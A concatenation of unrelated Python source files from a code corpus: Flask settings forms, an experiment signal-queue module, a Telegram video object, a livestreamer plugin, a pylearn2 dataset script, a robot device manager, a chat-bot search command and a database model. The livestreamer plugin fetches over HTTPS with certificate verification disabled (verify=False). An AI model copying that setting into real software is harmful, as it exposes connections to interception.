choices=DURATIONS)
rrate = SelectField('choose page refresh rate : ',
coerce=str,
choices=DURATIONS)
effect = SelectField('choose visual motion effect for notification : ',
coerce=str,
choices=VISUAL_EFFECTS)
repeats = SelectField('choose motion effect number of repeats : ',
coerce=str,
choices=VISUAL_EFFECT_REPEATS)
anr = SelectField('Number of announcement repeating : ',
coerce=int,
choices=ANNOUNCEMENT_REPEATS)
anrt = SelectField('Type of announcement and notification repeating :',
coerce=str,
choices=ANNOUNCEMENT_REPEAT_TYPE)
naudio = SelectField('Select audio notification : ',
coerce=int,
choices=[(0, 'Disable audio notification')])
bgcolor = StringField('Select a background color : ')
prefix = BooleanField('Attach prefix office letter: ')
always_show_ticket_number = BooleanField('Always show ticket number: ')
wait_for_announcement = BooleanField('Wait for announcement to finish:')
hide_ticket_index = BooleanField('Hide ticket index number:')
submit = SubmitField('Apply')
for shortcode in get_tts_safely().keys():
locals()[f'check{shortcode}'] = BooleanField()
def __init__(self, *args, **kwargs):
super(DisplayScreenForm, self).__init__(*args, **kwargs)
for m in Media.get_all_images():
self.background.choices += [(m.id, f'{m.id}. {m.name}')]
for m in Media.get_all_audios():
self.naudio.choices += [(m.id, f'{m.id}. {m.name}')]
for shortcode, bundle in get_tts_safely().items():
self[f'check{shortcode}'].label = self.translate(bundle.get('language'))
class SlideAddForm(LocalizedForm):
title = StringField('Enter a slide title :')
hsize = SelectField('Select a title font size :',
coerce=str,
choices=FONT_SIZES)
hcolor = StringField('Select a title font color :')
hfont = StringField('Select a title font :')
hbg = StringField('Select title background color :')
subti = StringField('Enter a subtitle :')
tsize = SelectField('Select subtitle font size :',
coerce=str,
choices=FONT_SIZES)
tcolor = StringField('Select sub title color :')
tfont = StringField('Select subtitle font :')
tbg = StringField('Select subtitle background color :')
background = SelectField('Select background : ',
coerce=int,
choices=[(0, 'Use color selection')])
bgcolor = StringField('Select background color : ')
submit = SubmitField('Add a slide')
def __init__(self, *args, **kwargs):
super(SlideAddForm, self).__init__(*args, **kwargs)
for m in Media.get_all_images():
self.background.choices += [(m.id, f'{m.id}. {m.name}')]
class SlideSettingsForm(LocalizedForm):
status = SelectField('Disable or enable slide-show :',
coerce=int,
choices=BOOLEAN_SELECT_1)
effect = SelectField('Select transition effect :',
coerce=str,
choices=SLIDE_EFFECTS)
navigation = SelectField('Slide navigation bars :',
coerce=int,
choices=BOOLEAN_SELECT_1)
rotation = SelectField('Slide images rotation :',
coerce=str,
choices=SLIDE_DURATIONS)
submit = SubmitField('Apply')
class MultimediaForm(LocalizedForm):
mf = FileField('Select multimedia file :',
validators=[FileAllowed(
reduce(lambda sum, group: sum + group, SUPPORTED_MEDIA_FILES),
'make sure you followed the given conditions !')])
submit = SubmitField('Upload')
class VideoForm(LocalizedForm):
video = SelectField('Select uploaded video to use : ',
coerce=int,
choices=[(0, 'Do not assign video')])
enable = SelectField('Enable or disable video : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
ar = SelectField('Auto replaying the video : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
controls = SelectField('Enable or disable video controls : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
mute = SelectField('Mute sound : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
submit = SubmitField('Set video')
def __init__(self, defLang='en', *args, **kwargs):
super(VideoForm, self).__init__(*args, **kwargs)
videos = Media.get_all_videos()
for v in videos:
self.video.choices.append((v.id, f'{v.id}. {v.name}'))
if not videos:
self.video.choices = [(0, self.translate('No videos were found'))]
class TicketForm(LocalizedForm):
kind = SelectField('Select type of ticket to use : ',
coerce=int,
choices=TICKET_TYPES)
value = SelectField('Select a value of registering : ',
coerce=int,
choices=TICKET_REGISTERED_TYPES)
langu = SelectField('Select language of printed ticket : ',
choices=list(SUPPORTED_LANGUAGES.items()),
coerce=str)
printers = SelectField('Select a usb printer : ',
coerce=str,
choices=[('00', 'No printers were found')])
scale = SelectField('Select font scaling measurement for printed tickets :',
coerce=int)
header = StringField('Enter a text header : ')
sub = StringField('Enter a text sub-header : ')
submit = SubmitField('Set ticket')
def __init__(self, inspected_printers_from_view, lp_printing, *args, **kwargs):
super(TicketForm, self).__init__(*args, **kwargs)
# NOTE: here so it won't be localized.
self.scale.choices = [(i, f'x{i}') for i in PRINTED_TICKET_SCALES]
if inspected_printers_from_view:
self.printers.choices = []
for printer in inspected_printers_from_view:
if os.name == 'nt' or lp_printing:
self.printers.choices.append((f'{printer}', f'Printer Name: {printer}'))
else:
vendor, product = printer.get('vendor'), printer.get('product')
in_ep, out_ep = printer.get('in_ep'), printer.get('out_ep')
identifier = f'{vendor}_{product}'
if in_ep and out_ep:
identifier += f'_{in_ep}_{out_ep}'
self.printers.choices.append((identifier, f'Printer ID: {vendor}_{product}'))
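
    # Illustrative identifier built above (hypothetical values): vendor
    # '04b8', product '0202' with endpoints '82'/'01' yields
    # '04b8_0202_82_01'; without endpoint info it is just '04b8_0202'.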
class AliasForm(LocalizedForm):
    _message = 'Alias must be at least 2 and at most 10 letters'
office = StringField('Enter alias for office : ',
validators=[InputRequired(_message), Length(2, 10)])
task = StringField('Enter alias for task : ',
validators=[InputRequired(_message), Length(2, 10)])
ticket = StringField('Enter alias for ticket : ',
validators=[InputRequired(_message), Length(2, 10)])
name = StringField('Enter alias for name : ',
validators=[InputRequired(_message), Length(2, 10)])
number = StringField('Enter alias for number : ',
validators=[InputRequired(_message), Length(2, 10)])
class BackgroundTasksForms(LocalizedForm):
_every_message = 'Time range to repeat the task within :'
_time_message = 'Specific time to execute the task in :'
cache_tts_enabled = BooleanField('Enable caching text-to-speech announcements :')
cache_tts_every = SelectField(_every_message,
coerce=str,
choices=[(o, o) for o in EVERY_OPTIONS])
delete_tickets_enabled = BooleanField('Enable deleting tickets :')
delete_tickets_every = SelectField(_every_message,
coerce=str,
choices=[(o, o) for o in EVERY_OPTIONS])
delete_tickets_time = TimeField(_time_message,
validators=[Optional()])
| mpl-2.0 | -1,921,860,395,263,956,500 | 46.879725 | 104 | 0.556162 | false | 4.596833 | false | false | false |
bburan/psiexperiment | psi/controller/queue.py | 1 | 10732 | import logging
log = logging.getLogger(__name__)
import itertools
import copy
import uuid
from collections import deque
import numpy as np
from enaml.core.api import Declarative
class QueueEmptyError(Exception):
pass
class QueueBufferEmptyError(Exception):
pass
def as_iterator(x):
if x is None:
x = 0
try:
x = iter(x)
except TypeError:
x = itertools.cycle([x])
return x
class AbstractSignalQueue:
def __init__(self):
        '''
        Notes
        -----
        The sampling rate of the output that will use this queue and the
        queue start time are not constructor arguments; provide them via
        `set_fs` and `set_t0` before samples are generated.
        '''
self._delay_samples = 0
self._data = {} # list of generators
self._ordering = [] # order of items added to queue
self._source = None
self._samples = 0
self._notifiers = []
def set_fs(self, fs):
# Sampling rate at which samples will be generated.
self._fs = fs
def set_t0(self, t0):
# Sample at which queue was started relative to experiment acquisition
# start.
self._t0 = t0
def _add_source(self, source, trials, delays, duration, metadata):
key = uuid.uuid4()
if duration is None:
duration = source.shape[-1]/self._fs
data = {
'source': source,
'trials': trials,
'delays': as_iterator(delays),
'duration': duration,
'metadata': metadata,
}
self._data[key] = data
return key
def get_max_duration(self):
def get_duration(source):
try:
return source.get_duration()
except AttributeError:
return source.shape[-1]/self._fs
return max(get_duration(d['source']) for d in self._data.values())
def connect(self, callback):
self._notifiers.append(callback)
def _notify(self, trial_info):
for notifier in self._notifiers:
notifier(trial_info)
def insert(self, source, trials, delays=None, duration=None, metadata=None):
k = self._add_source(source, trials, delays, duration, metadata)
        self._ordering.insert(0, k)  # insert at the front of the queue
return k
def append(self, source, trials, delays=None, duration=None, metadata=None):
k = self._add_source(source, trials, delays, duration, metadata)
self._ordering.append(k)
return k
def count_factories(self):
return len(self._ordering)
def count_trials(self):
return sum(v['trials'] for v in self._data.values())
def is_empty(self):
return self.count_trials() == 0
def next_key(self):
raise NotImplementedError
def pop_next(self, decrement=True):
key = self.next_key()
return key, self.pop_key(key, decrement=decrement)
def pop_key(self, key, decrement=True):
'''
Removes one trial of specified key from queue and returns waveform
'''
data = self._data[key]
if decrement:
self.decrement_key(key)
return data
def remove_key(self, key):
'''
Removes key from queue entirely, regardless of number of trials
'''
self._data.pop(key)
self._ordering.remove(key)
def decrement_key(self, key, n=1):
if key not in self._ordering:
raise KeyError('{} not in queue'.format(key))
self._data[key]['trials'] -= n
if self._data[key]['trials'] <= 0:
self.remove_key(key)
def _get_samples_waveform(self, samples):
if samples > len(self._source):
waveform = self._source
complete = True
else:
waveform = self._source[:samples]
self._source = self._source[samples:]
complete = False
return waveform, complete
def _get_samples_generator(self, samples):
samples = min(self._source.get_remaining_samples(), samples)
waveform = self._source.next(samples)
complete = self._source.is_complete()
return waveform, complete
def next_trial(self, decrement=True):
'''
Setup the next trial
This has immediate effect. If you call this (from external code), the
current trial will not finish.
'''
key, data = self.pop_next(decrement=decrement)
self._source = data['source']
try:
self._source.reset()
self._get_samples = self._get_samples_generator
except AttributeError:
self._source = data['source']
self._get_samples = self._get_samples_waveform
delay = next(data['delays'])
self._delay_samples = int(delay*self._fs)
if self._delay_samples < 0:
            raise ValueError('Intertrial delay must be non-negative')
queue_t0 = self._samples/self._fs
uploaded = {
't0': self._t0 + queue_t0, # Time re. acq. start
'queue_t0': queue_t0, # Time re. queue start
'duration': data['duration'], # Duration of token
'key': key, # Unique ID
'metadata': data['metadata'], # Metadata re. token
}
self._notify(uploaded)
def pop_buffer(self, samples, decrement=True):
'''
Return the requested number of samples
        Removes stack of waveforms in order determined by `pop`, but only returns
requested number of samples. If a partial fragment of a waveform is
returned, the remaining part will be returned on subsequent calls to
this function.
'''
# TODO: This is a bit complicated and I'm not happy with the structure.
# It should be simplified quite a bit. Cleanup?
waveforms = []
queue_empty = False
# Load samples from current source
if samples > 0 and self._source is not None:
# That this is a dynamic function that is set when the next
# source is loaded (see below in this method).
waveform, complete = self._get_samples(samples)
samples -= len(waveform)
self._samples += len(waveform)
waveforms.append(waveform)
if complete:
self._source = None
# Insert intertrial interval delay
if samples > 0 and self._delay_samples > 0:
n_padding = min(self._delay_samples, samples)
waveform = np.zeros(n_padding)
samples -= n_padding
self._samples += len(waveform)
self._delay_samples -= n_padding
waveforms.append(waveform)
# Get next source
if (self._source is None) and (self._delay_samples == 0):
try:
self.next_trial(decrement)
except QueueEmptyError:
queue_empty = True
waveform = np.zeros(samples)
waveforms.append(waveform)
log.info('Queue is now empty')
if (samples > 0) and not queue_empty:
waveform, queue_empty = self.pop_buffer(samples, decrement)
waveforms.append(waveform)
samples -= len(waveform)
waveform = np.concatenate(waveforms, axis=-1)
return waveform, queue_empty
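
    # Illustrative behaviour (hypothetical numbers): with fs=1000, a
    # 100-sample source and a 0.05 s intertrial delay, pop_buffer(60) returns
    # the first 60 source samples; the next call returns the remaining 40
    # samples plus zero padding drawn from the 50-sample delay.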
class FIFOSignalQueue(AbstractSignalQueue):
'''
Return waveforms based on the order they were added to the queue
'''
def next_key(self):
if len(self._ordering) == 0:
raise QueueEmptyError
return self._ordering[0]
class InterleavedFIFOSignalQueue(AbstractSignalQueue):
'''
Return waveforms based on the order they were added to the queue; however,
trials are interleaved.
'''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._i = -1
self._complete = False
def next_key(self):
if self._complete:
raise QueueEmptyError
self._i = (self._i + 1) % len(self._ordering)
return self._ordering[self._i]
def decrement_key(self, key, n=1):
if key not in self._ordering:
raise KeyError('{} not in queue'.format(key))
self._data[key]['trials'] -= n
for key, data in self._data.items():
if data['trials'] > 0:
return
self._complete = True
def count_trials(self):
return sum(max(v['trials'], 0) for v in self._data.values())
class RandomSignalQueue(AbstractSignalQueue):
'''
Return waveforms in random order
'''
def next_key(self):
if len(self._ordering) == 0:
raise QueueEmptyError
i = np.random.randint(0, len(self._ordering))
return self._ordering[i]
class BlockedRandomSignalQueue(InterleavedFIFOSignalQueue):
def __init__(self, seed=0, *args, **kwargs):
super().__init__(*args, **kwargs)
self._i = []
self._rng = np.random.RandomState(seed)
def next_key(self):
if self._complete:
raise QueueEmptyError
if not self._i:
# The blocked order is empty. Create a new set of random indices.
i = np.arange(len(self._ordering))
self._rng.shuffle(i)
self._i = i.tolist()
i = self._i.pop()
return self._ordering[i]
class GroupedFIFOSignalQueue(FIFOSignalQueue):
def __init__(self, group_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self._i = -1
self._group_size = group_size
def next_key(self):
if len(self._ordering) == 0:
raise QueueEmptyError
self._i = (self._i + 1) % self._group_size
return self._ordering[self._i]
def decrement_key(self, key, n=1):
if key not in self._ordering:
raise KeyError('{} not in queue'.format(key))
self._data[key]['trials'] -= n
# Check to see if the group is complete. Return from method if not
# complete.
for key in self._ordering[:self._group_size]:
if self._data[key]['trials'] > 0:
return
# If complete, remove the keys
for key in self._ordering[:self._group_size]:
self.remove_key(key)
queues = {
'first-in, first-out': FIFOSignalQueue,
'interleaved first-in, first-out': InterleavedFIFOSignalQueue,
'random': RandomSignalQueue,
}
| mit | -7,834,932,730,603,202,000 | 29.750716 | 80 | 0.573891 | false | 4.093059 | false | false | false |
jacopodl/TbotPy | src/Object/Video.py | 1 | 2539 | """
<This library provides a Python interface for the Telegram Bot API>
Copyright (C) <2015> <Jacopo De Luca>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from Object.AUFile import AUFile
from Object.PhotoSize import PhotoSize
class Video(AUFile):
"""
This object represents a video file.
"""
def __init__(self, file_id, width, height, duration, thumb=None, mime_type="", file_size=0):
"""
:param file_id: Unique identifier for this file
:type file_id: str
:param width: Video width as defined by sender
:type width: int
:param height: Video height as defined by sender
:type height: int
:param duration: Duration of the video in seconds as defined by sender
:type duration: int
:param thumb: Optional. Video thumbnail
:type thumb: PhotoSize
:param mime_type: Optional. Mime type of a file as defined by sender
:type mime_type: str
:param file_size: Optional. File size
:type file_size: int
"""
super().__init__(file_id, file_size, mime_type=mime_type)
self.width = width
self.height = height
self.duration = duration
self.thumb = thumb
@staticmethod
def build_from_json(jvideo):
"""
:param jvideo: A dictionary that contains JSON-parsed object
:type jvideo: dict
:rtype: Video
"""
thumb = None
mime_type = ""
file_size = 0
if 'thumb' in jvideo.keys():
thumb = PhotoSize.build_from_json(jvideo['thumb'])
if 'mime_type' in jvideo.keys():
mime_type = jvideo['mime_type']
if 'file_size' in jvideo.keys():
file_size = int(jvideo['file_size'])
return Video(jvideo['file_id'], int(jvideo['width']), int(jvideo['height']), int(jvideo['duration']), thumb,
mime_type, file_size)
| gpl-3.0 | -2,514,527,228,052,287,500 | 35.797101 | 116 | 0.629382 | false | 4.182867 | false | false | false |
guymakam/Kodi-Israel | plugin.video.israelive/resources/lib/livestreamer/plugins/connectcast.py | 2 | 2066 | import re
from livestreamer.plugin import Plugin
from livestreamer.plugin.api import http, validate
from livestreamer.stream import HTTPStream, RTMPStream
from livestreamer.plugin.api.support_plugin import common_jwplayer as jwplayer
BASE_VOD_URL = "https://www.connectcast.tv"
SWF_URL = "https://www.connectcast.tv/jwplayer/jwplayer.flash.swf"
_url_re = re.compile(r"http(s)?://(\w+\.)?connectcast\.tv/")
_smil_schema = validate.Schema(
validate.union({
"base": validate.all(
validate.xml_find("head/meta"),
validate.get("base"),
validate.url(scheme="rtmp")
),
"videos": validate.all(
validate.xml_findall("body/video"),
[validate.get("src")]
)
})
)
class ConnectCast(Plugin):
@classmethod
def can_handle_url(self, url):
return _url_re.match(url)
def _get_smil_streams(self, url):
res = http.get(url, verify=False)
smil = http.xml(res, schema=_smil_schema)
for video in smil["videos"]:
stream = RTMPStream(self.session, {
"rtmp": smil["base"],
"playpath": video,
"swfVfy": SWF_URL,
"pageUrl": self.url,
"live": True
})
yield "live", stream
def _get_streams(self):
res = http.get(self.url)
playlist = jwplayer.parse_playlist(res)
if not playlist:
return
for item in playlist:
for source in item["sources"]:
filename = source["file"]
if filename.endswith(".smil"):
# TODO: Replace with "yield from" when dropping Python 2.
for stream in self._get_smil_streams(filename):
yield stream
elif filename.startswith("/"):
name = source.get("label", "vod")
url = BASE_VOD_URL + filename
yield name, HTTPStream(self.session, url)
break
__plugin__ = ConnectCast
| gpl-2.0 | 439,076,412,555,663,100 | 29.382353 | 78 | 0.547919 | false | 3.927757 | false | false | false |
harmsm/rpyBot | rpyBot/manager.py | 2 | 7209 | __description__ = \
"""
"""
__author__ = "Michael J. Harms"
__date__ = "2014-06-18"
import multiprocessing, time, random, copy
from rpyBot.messages import RobotMessage
class DeviceManager:
"""
Class for aynchronous communication and integration between all of the
devices attached to the robot. It runs on the main thread and then spawns
a thread for each device attached to the robot.
"""
def __init__(self,device_list=[],poll_interval=0.1,verbosity=0):
"""
Initialize.
device_list: list of RobotDevice instances
poll_interval: how often to poll messaging queues (in seconds)
verbosity: whether or not to spew messages to standard out
"""
self.device_list = device_list
self.poll_interval = poll_interval
self.verbosity = verbosity
self.queue = []
self.loaded_devices = []
self.loaded_devices_dict = {}
self.device_processes = []
self.manager_id = int(random.random()*1e9)
self._run_loop = False
def start(self):
"""
Start the main loop running.
"""
self._run_loop = True
self._run()
def stop(self):
"""
Stop the main loop from running. Does not automatically unload devices
or stop them.
"""
self._run_loop = False
def shutdown(self):
"""
Shutdown all loaded devices (will propagate all the way down to cleanup
of GPIO pins).
"""
for d in self.loaded_devices:
self.unload_device(d.name)
def load_device(self,d):
"""
Load a device into the DeviceManager.
"""
try:
d.connect(self.manager_id)
if d.name in list(self.loaded_devices_dict.keys()):
message = "device {:s} already connected!".format(d.name)
self._queue_message(message,destination_device="warn")
else:
self.loaded_devices.append(d)
self.loaded_devices_dict[d.name] = len(self.loaded_devices) - 1
self.device_processes.append(multiprocessing.Process(target=self.loaded_devices[-1].start))
self.device_processes[-1].start()
except exceptions.BotConnectionError as err:
self._queue_message(err,destination_device="warn")
def unload_device(self,device_name):
"""
Unload a device from the control of the DeviceManager.
"""
try:
index = self.loaded_devices_dict[device_name]
            # Stop the device, disconnect it from this device manager instance,
            # and then kill its process.
self.loaded_devices[index].stop(self.manager_id)
self.loaded_devices[index].disconnect()
self.device_processes[index].terminate()
# Remove it from the lists holding the devices.
            for k in self.loaded_devices_dict.keys():
                if self.loaded_devices_dict[k] > index:
                    self.loaded_devices_dict[k] -= 1
self.loaded_devices.pop(index)
self.loaded_devices_dict.pop(device_name)
self.device_processes.pop(index)
except KeyError:
message = "device {} is not connected".format(device_name)
self._queue_message(message,destination_device="warn")
def _run(self):
for d in self.device_list:
self.load_device(d)
self._queue_message("starting system")
while self._run_loop:
# Go through the queue and pipe messages to appropriate devices
if len(self.queue) > 0:
# Get the next message
message = self._get_message()
# If the message is past its delay, send it to a device. If not,
# stick it back into the queue
if message.check_delay() == True:
self._message_to_device(message)
else:
self._queue_message(message)
# Rotate through the loaded devices and see if any of them have
# output ready. If so, put the output into the queue for the next
# pass.
for d in self.loaded_devices:
msgs = d.get()
for m in msgs:
self._queue_message(m)
# Wait poll_interval seconds before checking queues again
time.sleep(self.poll_interval)
def _message_to_device(self,message):
"""
Send a RobotMessage instance to appropriate devices
"""
# if the message is sent to the virtual "warn" device, forward this to
# the controller
if message.destination_device == "warn":
self.loaded_devices[self.loaded_devices_dict["controller"]].put(message)
return
try:
self.loaded_devices[self.loaded_devices_dict[message.destination_device]].put(message)
except KeyError:
err = "device \"{}\" not loaded.".format(message.destination_device)
self._queue_message(err,destination_device="warn")
def _queue_message(self,
message="",
destination="robot",
destination_device="",
delay_time=0.0,
msg_string=None):
"""
        Append a RobotMessage instance to the message queue. If message
is already a RobotMessage, pass it through without modification. If it
is a string, construct the RobotMessage, setting source to "manager".
"""
if type(message) != RobotMessage:
m = RobotMessage(destination=destination,
destination_device=destination_device,
source="manager",
source_device="",
delay_time=delay_time,
message=message)
# If msg_string is set to something besides None, parse that string
# and load into the RobotMessage instance.
if msg_string != None:
m.from_string(msg_string)
message = m
if self.verbosity > 0:
message.pretty_print()
self.queue.append(message) #.put(message)
def _get_message(self):
"""
Return the first message in the queue.
"""
if len(self.queue) == 0:
return
message = self.queue.pop(0) #.get()
# If this is a raw message string, convert it to a RobotMessage
# instance
if type(message) == str:
try:
m = RobotMessage()
m.from_string(message)
message = m
except exceptions.BotMessageError as err:
message = "Mangled message ({})".format(err.args[0])
self._queue_message(message,destination_device="warn")
return None
if self.verbosity > 0:
message.pretty_print()
return message
| mit | -6,191,918,146,514,756,000 | 31.917808 | 107 | 0.545152 | false | 4.565548 | false | false | false |
se4u/pylearn2 | pylearn2/scripts/tutorials/gae_demo/make_random_dataset.py | 39 | 4281 | """
This script creates a preprocessed dataset of image pairs
related by the defined transformation. The content of the
images is generated from a uniform distribution, to show
that the gating models do not depend on the content but
only on the relations between the image pairs.
"""
import itertools
import numpy
from pylearn2.datasets import preprocessing
from pylearn2.utils import serial
from pylearn2.datasets import dense_design_matrix
from pylearn2.utils.rng import make_np_rng
from pylearn2.datasets.vector_spaces_dataset import VectorSpacesDataset
from pylearn2.space import VectorSpace, CompositeSpace, Conv2DSpace
def generate(opc):
"""
Summary (Generates a dataset with the chosen transformation).
Parameters
----------
opc: string
Only two options, shifts or rotations.
"""
dim = 19 # outer square
# A bigger image is used to avoid empty pixels in the
# borders.
reg = 13 # inner square
total = 20000 # Number of training examples
im1 = numpy.zeros((total, reg, reg, 1), dtype='float32')
im2 = numpy.zeros((total, reg, reg, 1), dtype='float32')
Y = numpy.zeros((total, 1), dtype='uint8')
rng = make_np_rng(9001, [1, 2, 3], which_method="uniform")
transformation = opc
if transformation == 'shifts':
# Shifts
# only shifts between [-3, +3] pixels
shifts = list(itertools.product(range(-3, 4), range(-3, 4)))
t = 0
while t < total:
x = rng.uniform(0, 1, (dim, dim))
x = numpy.ceil(x * 255)
im_x = x[3:16, 3:16][:, :, None]
ind = rng.randint(0, len(shifts))
Y[t] = ind
txy = shifts[ind]
tx, ty = txy
im_y = x[(3 + tx):(16 + tx), (3 + ty):(16 + ty)][:, :, None]
im1[t, :] = im_x
im2[t, :] = im_y
t += 1
else:
assert transformation == 'rotations'
# Rotations
import Image
# import cv2
angs = numpy.linspace(0, 359, 90)
t = 0
while t < total:
x = rng.uniform(0, 1, (dim, dim))
x = numpy.ceil(x * 255)
im_x = x[3:16, 3:16][:, :, None]
ind = rng.randint(0, len(angs))
Y[t] = ind
ang = angs[ind]
y = numpy.asarray(Image.fromarray(x).rotate(ang))
# scale = 1
# M1 = cv2.getRotationMatrix2D((dim/2, dim/2), ang, scale)
# y = cv2.warpAffine(x, M1, (dim, dim))
im_y = y[3:16, 3:16][:, :, None]
im1[t, :] = im_x
im2[t, :] = im_y
t += 1
view_converter = dense_design_matrix.DefaultViewConverter((reg, reg, 1))
design_X = view_converter.topo_view_to_design_mat(im1)
design_Y = view_converter.topo_view_to_design_mat(im2)
# Normalize data:
pipeline = preprocessing.Pipeline()
gcn = preprocessing.GlobalContrastNormalization(
sqrt_bias=10., use_std=True)
pipeline.items.append(gcn)
XY = numpy.concatenate((design_X, design_Y), 0)
XY_ImP = dense_design_matrix.DenseDesignMatrix(X=XY)
XY_ImP.apply_preprocessor(preprocessor=pipeline, can_fit=True)
X1 = XY_ImP.X[0:design_X.shape[0], :]
X2 = XY_ImP.X[design_X.shape[0]:, :]
# As a Conv2DSpace
topo_X1 = view_converter.design_mat_to_topo_view(X1)
topo_X2 = view_converter.design_mat_to_topo_view(X2)
axes = ('b', 0, 1, 'c')
data_specs = (CompositeSpace(
[Conv2DSpace((reg, reg), num_channels=1, axes=axes),
Conv2DSpace((reg, reg), num_channels=1, axes=axes),
VectorSpace(1)]),
('featuresX', 'featuresY', 'targets'))
train = VectorSpacesDataset((topo_X1, topo_X2, Y), data_specs=data_specs)
# As a VectorSpace
# data_specs = (CompositeSpace(
# [VectorSpace(reg * reg),
# VectorSpace(reg * reg),
# VectorSpace(1)]),
# ('featuresX', 'featuresY', 'targets'))
# train = VectorSpacesDataset(data=(X1, X2, Y), data_specs=data_specs)
import os
save_path = os.path.dirname(os.path.realpath(__file__))
serial.save(os.path.join(save_path, 'train_preprocessed.pkl'), train)
if __name__ == '__main__':
# Define the desired transformation between views
generate('shifts') # shifts or rotations
| bsd-3-clause | -1,117,137,382,878,355,200 | 33.804878 | 77 | 0.58818 | false | 3.310905 | false | false | false |
PatrickKennedy/pygab | plugins/plugin_search.py | 1 | 2865 | #!/usr/bin/env python
#
# PyGab - Python Jabber Framework
# Copyright (c) 2008, Patrick Kennedy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
import random
import re
import shlex
import time
from common import argparse, const, mounts, utils
from common.ini import iMan
class Init(mounts.PluginInitializers):
name = __file__
def initialize(self):
iMan.load([utils.get_module(), 'roster'])
def __exit__(self, *args):
iMan.unload('roster')
mounts.PluginInitializers.remove(self.__class__)
class Search(mounts.CommandMount):
name = 'search'
rank = const.RANK_USER
file = __file__
__doc__ = """Search for users containing a passed arg.
Dan - Searches for all names containing 'dan'
*Dan - Searches for all names ending with 'dan'
Dan* - Searches for all names beginning with 'dan'"""
def thread(self, user, sub, whisper):
#if not self.parent.was_whispered and not utils.isadmin(user):
#raise const.CommandHelp, 'Whisper Only Command'
sub = sub.lower().encode('utf-8', 'replace')
base = str
if len(sub) < 3:
raise const.CommandHelp, 'Minimum 3 Letters'
if sub.startswith('*'):
sub = sub[1:]
func = base.endswith
elif sub.endswith('*'):
sub = sub[:-1]
func = base.startswith
else:
func = base.count
names = [name for name in iMan.roster if func(name, sub)]
if names:
reply = 'Matched Names (%s) - %s' % (len(names), ', '.join(names))
else:
reply = "I can't find anyone with your search parameters."
if self.parent.was_whispered:
self.parent.sendto(user, reply)
else:
self.parent.sendtoall(reply)
| bsd-2-clause | 7,516,865,461,557,719,000 | 31.931034 | 76 | 0.72356 | false | 3.506732 | false | false | false |
stdweird/aquilon | upgrade/1.4.5/aquilon/aqdb/model/user_principal.py | 4 | 4174 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Contains tables and objects for authorization in Aquilon """
from datetime import datetime
from sqlalchemy import (Table, Column, Integer, DateTime, Sequence, String,
select, ForeignKey, PassiveDefault, UniqueConstraint)
from sqlalchemy.orm import relation, deferred
from aquilon.aqdb.model import Base, Role, Realm
class UserPrincipal(Base):
""" Simple class for strings representing users kerberos credential """
__tablename__ = 'user_principal'
id = Column(Integer, Sequence('user_principal_id_seq'), primary_key=True)
name = Column(String(32), nullable=False)
realm_id = Column(Integer, ForeignKey(
'realm.id', name='usr_princ_rlm_fk'), nullable=False)
role_id = Column(Integer, ForeignKey(
'role.id', name='usr_princ_role_fk', ondelete='CASCADE'),
nullable=False)
creation_date = deferred(Column(DateTime,
nullable=False, default=datetime.now))
comments = deferred(Column('comments', String(255), nullable=True))
realm = relation(Realm, uselist=False)
role = relation(Role, uselist=False)
def __str__(self):
return '@'.join([self.name,self.realm.name])
user_principal = UserPrincipal.__table__
user_principal.primary_key.name='user_principal_pk'
user_principal.append_constraint(
UniqueConstraint('name','realm_id',name='user_principal_realm_uk'))
table = user_principal
def populate(sess, *args, **kw):
if len(sess.query(UserPrincipal).all()) < 1:
log = kw['log']
from sqlalchemy import insert
admin = sess.query(Role).filter_by(name='aqd_admin').one()
eng = sess.query(Role).filter_by(name='engineering').one()
ops = sess.query(Role).filter_by(name='operations').one()
telco = sess.query(Role).filter_by(name='telco_eng').one()
admins = ['cdb', 'aqdqa', 'njw', 'wesleyhe', 'daqscott', 'kgreen',
'benjones']
unixeng = ['cesarg', 'jasona', 'dankb', 'goliaa', 'samsh', 'hagberg',
'hookn', 'jelinker', 'kovacsk', 'lookerm', 'walkert', 'af',
